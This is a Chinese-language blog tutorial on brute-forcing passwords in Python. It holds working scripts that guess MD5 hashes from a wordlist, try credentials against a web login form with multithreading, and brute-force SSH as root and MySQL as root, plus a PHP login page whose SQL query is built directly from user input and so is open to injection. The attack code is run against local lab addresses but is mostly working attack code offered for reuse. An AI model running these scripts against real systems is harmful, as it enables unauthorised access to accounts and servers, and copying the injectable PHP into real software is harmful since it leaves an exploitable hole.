【Python】简单爆破破解

于 2024-08-08 07:30:00 发布
阅读量293 收藏 3
点赞数 7
分类专栏: python 文章标签: python windows 安全 web安全 网络安全 密码学 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/141000725
版权

暴力破解是一种针对密码的破译方法,通过逐个推算或使用工具批量验证来找到正确的密码。暴力破解是信息安全领域中一个非常重要的话题。在当今数字化时代,个人信息、企业数据和各种网络服务都依赖于密码来保护安全。因此,破解密码成为黑客获取未经授权访问的重要手段。暴力破解正是其中一种常见且有效的密码破解方法。它的原理很简单,就是通过尝试所有可能的密码组合,直到找到正确的密码。

一、爆破MD5

MD5算法是一种广泛使用的哈希函数,用于生成128位的消息摘要。它接受任意长度的输入,并输出固定长度的哈希值,通常用于验证数据完整性、数字签名、密码存储等领域。MD5算法以其简洁高效的设计和快速计算速度而闻名,但近年来由于其存在一些安全性弱点,逐渐被更安全的哈希算法所取代。MD5是不可逆算法,采用碰撞的方式进行破解。

import hashlib,time,requests
import threading

source =  hashlib.md5('456456'.encode()).hexdigest()

def string_md5(source):
    with open ('./password.txt',mode='r') as file:
        password_list = file.readlines()

    with open ('./password_append.txt',mode='r') as file:
        password_list_appent = file.readlines()
    #将两个文件的密码叠加
    password_list.extend(password_list_appent)
    # for password in password_list:  
    #     print(password)
#逐个比较
    for password in password_list:  
        if source == hashlib.md5(password.strip().encode()).hexdigest():
            print(f'成功找到,明文为:{password}')
            break
string_md5(source)

二、爆破后台登录页面

Requests 是一个功能强大且易于使用的 HTTP 库,专门用于发送各种 Web 请求和处理响应。它完全满足现代网络爬虫的需求,并且可以用于进行网站模拟请求、数据抓取和自动化测试等任务。使用request进行发包,在request.text的返回内容,从而判断是否登录成功。

构造Mysql数据库创建数据库learn ->创建表user -> user表内容:

构造登录后台代码:login.php

<?php
$username = $_POST['username'];
$password = $_POST['password'];


$conn = mysqli_connect('127.0.0.1','root','root','learn') or die('数据库连接失败');
$sql = "select * from user where name='$username' and password='$password'";
$result = mysqli_query($conn,$sql);
if (mysqli_num_rows($result) == 1){
    echo 'login-sucess';
}else{
    echo 'login-fail';
}


?>

已经用户名ls的情况下,爆破密码 

import hashlib,time,requests
import threading
#已只用户名ls爆破密码
def web_pb():
    url = 'http://127.0.0.1:8082/login.php'
    username = 'ls'
    password = ''
    count = 0
    with open ('./password.txt',mode='r') as file:
        password_list = file.readlines()
    for password in password_list:
        #print(password.strip())
        data = {'username':username,'password':password.strip()}
        resp = requests.post(url=url,data = data)
        #print(resp.text)
        count +=1
        if ('login-sucess' in resp.text):
            print(f'登录成功,密码为{password}',end='')
            print(f'尝试{count}次,成功找到')
web_pb()

 用户名密码未知情况下,用户名和密码一起爆破,采用多线程的方式,一个用户名一个线程

import hashlib,time,requests
import threading
#多线程爆破,一个用户一个线程
def chose_password(username):
    url = 'http://127.0.0.1:8082/login.php'
    username = username
    password = ''
    count = 0
    with open ('./password.txt',mode='r') as file:
        password_list = file.readlines()
    for password in password_list:
        #print(password.strip())
        data = {'username':username,'password':password.strip()}
        resp = requests.post(url=url,data = data)
        #print(resp.text)
        count +=1
        if ('login-sucess' in resp.text):
            print(f'登录成功,用户名{username},密码为{password}',end='')
            print(f'用户名:{username}尝试{count}次,成功找到')

def chose_username():
    with open('username.txt',mode='r') as file:
        username_list = file.readlines()
    for username in username_list:
        threading.Thread(target=chose_password,args=(username.strip(),)).start()
        
chose_username()

考虑用户名过多占用过多线程,5个用户名一个线程

import hashlib,time,requests
import threading
#每个线程负责5个用户
def five_user():
    with open ('./username.txt',mode='r') as file:
        user_list = file.readlines()
    for i in range(0,len(user_list),5):
        sub_user_list = user_list[i:i+5]
        threading.Thread(target=five_pb,args=(sub_user_list,)).start()

def five_pb(sub_user_list):
    url = 'http://127.0.0.1:8082/login.php'
    count = 0
    with open ('./password.txt',mode='r') as file:
        password_list = file.readlines()
    for username in sub_user_list:
        for password in password_list:
            #print(password.strip())
            data = {'username':username,'password':password.strip()}
            resp = requests.post(url=url,data = data)
            #print(resp.text)
            count +=1
            if ('login-sucess' in resp.text):
                print(f'登录成功,用户名{username},密码为{password}',end='')
                print(f'用户名:{username}尝试{count}次,成功找到')

five_user()

三、爆破SSH

Paramiko是一个用于SSHv2协议的Python实现,它提供了客户端和服务器的功能。通过Paramiko,你可以远程连接到SSH服务器并执行命令、上传和下载文件等操作。使用paramiko.connect连接,判断是否可以连接。

import paramiko
def ssh_pb(ip):
    with open('./password.txt',mode='r') as file:
        password_list = file.readlines()
    for passowrd in password_list:
        print(passowrd.strip())
        try:
            transport = paramiko.Transport((ip),22)
            transport.connect(username='root',password=passowrd.strip())
            
            print(f"登录的密码为{passowrd}")
        except:
           pass
ssh_pb('192.168.3.26')

四、爆破Mysql 

PyMySQL是一个流行的Python模块,专门用于连接和操作MySQL数据库。它提供了一个简单而强大的接口,使得开发者能够轻松地在Python程序中执行各种数据库操作,如查询、插入、更新和删除数据等。可以使用pymysql的connection方法来建立连接,测试是否能成功连接数据库。

import pymysql
def mysql_pb():
    with open('./password.txt',mode='r') as file:
        password_list = file.readlines()
    for password in password_list:
        try:
            conn = pymysql.connect(host='127.0.0.1',user='root',passwd=password)
            print(f"密码:{password}")
        except:
            pass
mysql_pb()

每篇一言:永远别放弃一个你每天都在想念的人

Cityミ slaves
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python实现暴力破解.py
06-18
使用python简单实现dvwa中的暴力破解,该代码仅用于学习,禁止赖用,不得用于违法活动。
python制作企业邮箱的爆破脚本
12-23
Python制作企业邮箱爆破脚本涉及的关键知识点包括Python编程、POP3协议、网络通信和安全性。以下是这些知识点的详细说明: 1. Python编程: - `sys.argv`:这是一个列表,用于获取命令行参数。在Python脚本中,`...
python遍历路径破解表单的示例
01-21
首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。 ​...
python的字典生成
07-28
我们可以使用Python的内置`open()`函数读取这些文件,并使用`csv`模块或简单的文本处理来解析数据并构建字典: ```python with open('read.txt', 'r') as f: lines = f.readlines() dictionary_from_file = {line...
dvwa爆破脚本pytho3版
09-04
核心在于获取token,python3中通过requests、re模块获取token,在结合生成的字典进行爆破,代码简单展示了获取token的主要过程
Python爬虫与MongoDB的完美结合
weixin_52392194的博客
08-03 697
我们掌握了在Windows和Linux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
伐木工 (100%用例)D卷 (Java&&Python&&C++&&Node.js&&C语言)
荆赫同艺的博客
08-07 35
一根 4米长的树木,伐木工不需要切割为 2*2,省去切割成本,直接整根树木交易,为 4*1,收益最大为 4。方式二: 3,2,2,3,但方式二,伐木工多切割一次,增加了切割成本却卖了一样的价格,因此并不是最优收益。一根 2 米长的树木,伐木工不切割,为2*1,收益最大为 2。一根5 米长的树木,伐木工切割为 2*3,收益最大为 6。输出最优收益时的各个树木长度,以空格分隔,按升序排列。一根 10 米长的树木,伐木工可以切割。方式一:3,4,4,也可以切割为。
jupyter下载
Einstein·Jun
08-06 363
Anaconda下载 参考链接:https://blog.csdn.net/qq_48372575/article/details/125630622 设置Jupyter Notebook的代码路径 在“此电脑”中搜索。删除最后一个""后面的的内容,包括“\”。 用记事本打开它。 按下ctrl+F就可以开始查找。查找内容如下: 找到之后,右键该文件,找到“发送到”,找到“桌面快捷方式”。然后就会发现桌面上已经建立好了!
Python语法基础常识
2401_86168842的博客
08-07 136
初步学习print函数时,我们可以看到print函数分别有无引号、单引号、三引号用法,即print()、print(' ')、print(''' ''')用法,他们之间的用法分别是怎样的呢?number='3.1415926',那么这行代码中,number就是变量,我们把数字“3.1415926”赋值给了number。print('')则是用于文字输出,当我们想要让计算机打出非纯数字内容时,就得在print函数中用单引号''。当然,可能有同学会好奇:“那我能不能不用单引号,用双引号呢?
Python 和 C++ 环境下安装和使用 ONNX Runtime
CDBmax的博客
08-03 356
对于 GPU 版本的 ONNX Runtime,需要安装 CUDA 和 cuDNN。请检查 CUDA 执行提供程序的要求以获取兼容版本的 CUDA 和 cuDNN。通过上述步骤和示例代码,您可以在 Python 和 C++ 环境下安装并使用 ONNX Runtime 进行模型推理。《windows端可以用 vs编辑器配置相应的头文件、库文件》《这部分可以去B站有很多教学视频讲的更详细》
【面试题】寻找两个正序数组的中位数
联系方式:927632640
08-06 390
面试学习给定两个大小分别为 m 和 n 的正序数组 nums1 和 nums2,我们需要找到这两个数组的中位数。下面是详细的解题步骤和 Python 代码示例。
[CSCCTF 2019 Qual]FlaskLight (jinja2模版注入)
weixin_73399382的博客
08-07 185
这种有参数的我先直接丢fengjing扫了一下,结果还真搞出来,这工具还是挺牛的,就是没参数的时候搞不了。输入{{7*‘7’}},返回7777777表示是 Jinjia2 模块。进入web界面输入前三个参数,表单输入就是刚才的search参数。输入{{config}}查看配置发现提示flag就在当前目录下。分析完后右边会提示你输入可以输入命令自动生成payload。或者中间加个+号也可以['__glo'+'bals__']输入{{7*‘7’}},返回49表示是 Twig 模块。下面是判断模版注入的方法。
昇思基础课程打卡(SPONGE课前学习)9.使用静态图加速
cftang9999的专栏
08-06 495
AI编译框架分为两种运行模式,分别是动态图模式以及静态图模式。MindSpore默认情况下是以动态图模式运行,但也支持手工切换为静态图模式。
python游戏开发之五子棋游戏制作
m0_65482549的博客
08-05 1440
它通过简洁明了的语法和逻辑结构,提高了代码的可读性和可维护性。通过引入交互性更强的用户输入方式,使得玩家可以更直观地参与游戏,增强了游戏的可玩性和用户体验。总的来说,这段 Python 在保持游戏逻辑不变的情况下,提升了代码的质量和可玩性,为开发者和玩家带来了更好的体验。如有侵权,请联系删除。
PAI-DSW中对齐NoteBook和命令行的Python环境
MilkLeong的博客
08-02 750
我认为在最开始NoteBook和命令行的Python环境是一致的,只是我前面在部署LLaMA-Factory时进行了如下操作将命令行的Python环境改成了/root/anaconda3/bin/python。具体详见。
Python知识】m.inplace = inplace 《==》是否执行原地操作
最新发布
2301_77549977的博客
08-07 42
属性是一个布尔值,用于指示某个操作是否可以以原地(in-place)模式执行。原地操作意味着操作会直接修改输入张量的值,而不是创建一个新的张量来存储结果。这种方式可以减少内存使用,因为它避免了为输出结果分配额外的内存空间。# 如果激活层模块有 inplace 属性,则设置该属性 if hasattr(m, 'inplace'): m.inplace = inplace inplace 属性是什么?,原地属性允许在不增加额外内存开销的情况下应用激活函数。涉及梯度更新时,原地操作需要谨慎使用。
【AI大模型】大模型应用开发学习线路
hiliang521的博客
08-04 1047
【AI大模型】大模型应用开发学习线路
Python网络爬虫案例】python爬虫之爬取豆瓣电影信息
左手の明天的博客
08-04 953
豆瓣是一个电影资讯网站,用户可以在网站上查找电影信息、评论电影等。我们希望通过爬虫程序获取豆瓣电影的名称、评分和简介等信息,以便进行数据分析或制作推荐系统。
python3 pyside6图形库学习笔记及实践(三)
qq_27489877的博客
08-05 714
本系列文章为b站PySide6教程以及官方文档的学习笔记。本文内容包括菜单栏、上下文菜单、折叠菜单以及资源的加载。
Python ssh 爆破脚本
05-29
Python ssh爆破脚本是一种用Python语言编写的程序,其主要作用是在未授权访问的情况下,尝试猜解SSH服务器的用户名和密码,以获取服务器权限。SSH爆破脚本可以使用多种方法进行用户名和密码的猜测,包括但不限于字典攻击、暴力破解简单密码猜测等。 这种脚本通常需要用户提供SSH服务器的IP地址、端口、用户名和密码字典等信息。运行后,程序会自动尝试使用不同的用户名和密码组合进行登录,直到登录成功或者所有组合都被尝试过为止。 当然,请注意,未经授权的访问是非法的,使用这样的脚本攻击他人服务器是违法行为,请勿用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值